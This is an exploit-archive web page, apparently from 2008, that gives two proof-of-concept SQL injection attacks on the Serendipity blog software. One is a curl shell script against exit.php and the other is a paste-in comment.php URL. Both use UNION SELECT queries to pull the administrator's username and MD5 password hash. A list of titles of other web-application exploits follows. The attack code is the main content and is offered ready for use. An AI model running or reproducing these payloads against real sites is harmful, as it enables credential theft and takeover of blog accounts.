Eklenme Tarihi: 2008-10-20 22:59
Proof of Concept 1
------------------
Usage: ./ser_sqli_poc.sh URL_to_Serendipity_Weblog
ser_sqli_poc.sh
---------8<-----------8<-------------
#!/bin/sh
echo -n "Username: "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20username%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
echo -n "MD5(password): "
curl -I -s "$1/exit.php?url_id=1&entry_id=1%20and%200%20union%20select%20password%20from%20serendipity_authors%20where%20authorid%3D1"
| grep Location | cut -b10-
---------8<-----------8<-------------
Proof of Concept 2
------------------
Copy&Paste this to your browser and edit URL_to_Serendipity_Weblog.
[url]http://URL_to_Serendipity_Weblog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/*[/url]
Keywords:
Benzer Sayfalar (Similar Pages):
Bulunamadı. (not found)
Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit /
Web Apps Exploit /
PHP-NUKE version <= 6.9 'cid' sql injection Remote ExploitExploit /
Web Apps Exploit /
phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit /
Web Apps Exploit /
LiteForum 2.1.1 sql injection exploitExploit /
Web Apps Exploit /
Lansuite <= 2.1.0 Beta (fid) Remote SQL Injection ExploitExploit /
Web Apps Exploit /
Plogger <= Beta 2.1 Administrative Credentials Disclosure ExploitExploit /
Web Apps Exploit /
BetaParticle Blog <= 6.0 (fldGalleryID) Remote SQL Injection ExploitExploit /
Web Apps Exploit /
Serendipity 0.8beta4 exit.php SQL Injection ExploitExploit /
Web Apps Exploit /
UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection ExploitExploit /
Web Apps Exploit /
PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
phpCC 4.2 beta (base_dir) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
SAPID Blog <= beta 2 (root_path) Remote File Include VulnerabilitiesExploit /
Web Apps Exploit /
OPENi-CMS <= 1.0.1beta (config) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
MiniPort@l <= 0.1.5 beta (skiny) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include ExploitExploit /
Web Apps Exploit /
SpeedBerg <= 1.2beta1 (SPEEDBERG_PATH) File Include VulnerabilitiesExploit /
Web Apps Exploit /
YapBB <= 1.2 Beta2 (yapbb_session.php) Remote File Include ExploitExploit /
Web Apps Exploit /
phpProfiles 2.1 Beta Multiple Remote File Include VulnerabilitiesExploit /
Web Apps Exploit /
phpPeanuts 1.3 Beta (Inspect.php) Remote File Include VulnerabilityExploit /
Web Apps Exploit /
CMSmelborp Beta (user_standard.php) Remote File Include ExploitExploit /
Web Apps Exploit /
iG Shop 1.0 (eval/sql injection) Multiple Remote VulnerabilitiesExploit /
Web Apps Exploit /
LocazoList <= 2.01a beta5 (subcatID) Remote SQL Injection VulnerabilityExploit /
Web Apps Exploit /
JGBBS 3.0beta1 (search.asp author) SQL Injection ExploitExploit /
Web Apps Exploit /
GestArt beta 1 (aide.php aide) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
OES (Open Educational System) 0.1beta Remote File Inclusion VulnExploit /
Web Apps Exploit /
MetaForum <= 0.513 Beta Remote File Upload ExploitExploit /
Web Apps Exploit /
RoseOnlineCMS 3 beta2 (op) Local File Inclusion ExploitExploit /
Web Apps Exploit /
sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion ExploitExploit /
Web Apps Exploit /
CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion VulnerabilityExploit /
Web Apps Exploit /
Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI VulnerabilitiesExploit /
Web Apps Exploit /
pL-PHP beta 0.9 Multiple Remote Vulnerabilities